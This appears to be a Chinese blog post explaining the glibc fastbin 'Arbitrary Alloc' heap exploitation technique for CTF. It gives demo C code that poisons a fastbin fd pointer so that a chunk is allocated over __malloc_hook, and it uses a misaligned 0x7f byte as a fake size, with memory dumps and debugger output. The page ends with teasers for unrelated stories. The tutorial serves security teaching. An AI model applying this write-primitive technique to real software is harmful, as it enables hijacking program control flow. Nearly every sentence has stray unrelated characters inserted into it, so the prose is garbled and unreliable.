[Fastbin Attack]Arbitrary Alloc

介紹

Arbitrary Alloc 其實(shí)與 Alloc to stack 是完全相同的,唯一的區(qū)別是分配的目標(biāo)不再是棧中勿决。 事實(shí)上只要滿足目標(biāo)地址存在合法的 size 域(這個(gè) size 域是構(gòu)造的将塑,還是自然存在的都無妨)禾唁,我們可以把 chunk 分配到任意的可寫內(nèi)存中曙强,比如 bss救湖、heap拣播、data晾咪、stack 等等。

演示

在這個(gè)例子贮配,我們使用字節(jié)錯(cuò)位來實(shí)現(xiàn)直接分配 fastbin 到_malloc_hook 的位置谍倦,相當(dāng)于覆蓋_malloc_hook 來控制程序流程。

int main(void)
{


    void *chunk1;
    void *chunk_a;

    chunk1=malloc(0x60);

    free(chunk1);

    *(long long *)chunk1=0x7ffff7dd1af5-0x8;
    malloc(0x60);
    chunk_a=malloc(0x60);
    return 0;
}

這里的 0x7ffff7dd1af5 是我根據(jù)本機(jī)的情況得出的值泪勒,這個(gè)值是怎么獲得的呢昼蛀?首先我們要觀察欲寫入地址附近是否存在可以字節(jié)錯(cuò)位的情況。

0x7ffff7dd1a88 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1a90 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1a98 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1aa0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1aa8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ab0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ab8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ac0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ac8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ad0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ad8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ae0 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ae8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1af8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1b00 0x20 0x2e 0xa9 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1b08 0x0  0x2a 0xa9 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1b10 <__malloc_hook>: 0x30    0x28    0xa9    0xf7    0xff    0x7f    0x0 0x0

0x7ffff7dd1b10 是我們想要控制的 __malloc_hook 的地址圆存,于是我們向上尋找是否可以錯(cuò)位出一個(gè)合法的 size 域叼旋。因?yàn)檫@個(gè)程序是 64 位的,因此 fastbin 的范圍為 32 字節(jié)到 128 字節(jié) (0x20-0x80)沦辙,如下:

//這里的size指用戶區(qū)域夫植,因此要小2倍SIZE_SZ
Fastbins[idx=0, size=0x10]
Fastbins[idx=1, size=0x20]
Fastbins[idx=2, size=0x30]
Fastbins[idx=3, size=0x40]
Fastbins[idx=4, size=0x50]
Fastbins[idx=5, size=0x60]
Fastbins[idx=6, size=0x70]

通過觀察發(fā)現(xiàn) 0x7ffff7dd1af5 處可以現(xiàn)實(shí)錯(cuò)位構(gòu)造出一個(gè) 0x000000000000007f

0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1af8 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0

0x7ffff7dd1af5 <_IO_wide_data_0+309>:   0x000000000000007f

因?yàn)?0x7f 在計(jì)算 fastbin index 時(shí),是屬于 index 5 的怕轿,即 chunk 大小為 0x70 的偷崩。

##define fastbin_index(sz)                                                      \
    ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

(注意 sz 的大小是 unsigned int辟拷,因此只占 4 個(gè)字節(jié))

而其大小又包含了 0x10 的 chunk_header,因此我們選擇分配 0x60 的 fastbin阐斜,將其加入鏈表衫冻。 最后經(jīng)過兩次分配可以觀察到 chunk 被分配到 0x7ffff7dd1afd,因此我們就可以直接控制 __malloc_hook 的內(nèi)容 (在我的 libc 中__realloc_hook 與__malloc_hook 是在連在一起的)。

0x4005a8 <main+66>        call   0x400450 <malloc@plt>
 →   0x4005ad <main+71>        mov    QWORD PTR [rbp-0x8], rax

 $rax   : 0x7ffff7dd1afd

0x7ffff7dd1aed <_IO_wide_data_0+301>:   0xfff7dd0260000000  0x000000000000007f
0x7ffff7dd1afd: 0xfff7a92e20000000  0xfff7a92a0000007f
0x7ffff7dd1b0d <__realloc_hook+5>:  0x000000000000007f  0x0000000000000000
0x7ffff7dd1b1d: 0x0000000000000000  0x0000000000000000

總結(jié)

Arbitrary Alloc 在 CTF 中用地更加頻繁。我們可以利用字節(jié)錯(cuò)位等方法來繞過 size 域的檢驗(yàn)盲再,實(shí)現(xiàn)任意地址分配 chunk位岔,最后的效果也就相當(dāng)于任意地址寫任意值。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末戚宦,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌蒙畴,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,546評(píng)論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件呜象,死亡現(xiàn)場(chǎng)離奇詭異膳凝,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)恭陡,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,224評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門蹬音,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人休玩,你說我怎么就攤上這事著淆。” “怎么了拴疤?”我有些...
    開封第一講書人閱讀 164,911評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵永部,是天一觀的道長(zhǎng)。 經(jīng)常有香客問我遥赚,道長(zhǎng)扬舒,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,737評(píng)論 1 294
  • 正文 為了忘掉前任凫佛,我火速辦了婚禮讲坎,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘愧薛。我一直安慰自己晨炕,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,753評(píng)論 6 392
  • 文/花漫 我一把揭開白布毫炉。 她就那樣靜靜地躺著瓮栗,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上费奸,一...
    開封第一講書人閱讀 51,598評(píng)論 1 305
  • 那天弥激,我揣著相機(jī)與錄音,去河邊找鬼愿阐。 笑死微服,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的缨历。 我是一名探鬼主播以蕴,決...
    沈念sama閱讀 40,338評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼辛孵!你這毒婦竟也來了丛肮?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,249評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤魄缚,失蹤者是張志新(化名)和其女友劉穎宝与,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體冶匹,經(jīng)...
    沈念sama閱讀 45,696評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡伴鳖,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,888評(píng)論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了徙硅。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,013評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡搞疗,死狀恐怖嗓蘑,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情匿乃,我是刑警寧澤桩皿,帶...
    沈念sama閱讀 35,731評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站幢炸,受9級(jí)特大地震影響泄隔,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜宛徊,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,348評(píng)論 3 330
  • 文/蒙蒙 一佛嬉、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧闸天,春花似錦暖呕、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,929評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春库物,著一層夾襖步出監(jiān)牢的瞬間霸旗,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,048評(píng)論 1 270
  • 我被黑心中介騙來泰國(guó)打工戚揭, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留诱告,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,203評(píng)論 3 370
  • 正文 我出身青樓毫目,卻偏偏與公主長(zhǎng)得像蔬啡,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子镀虐,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,960評(píng)論 2 355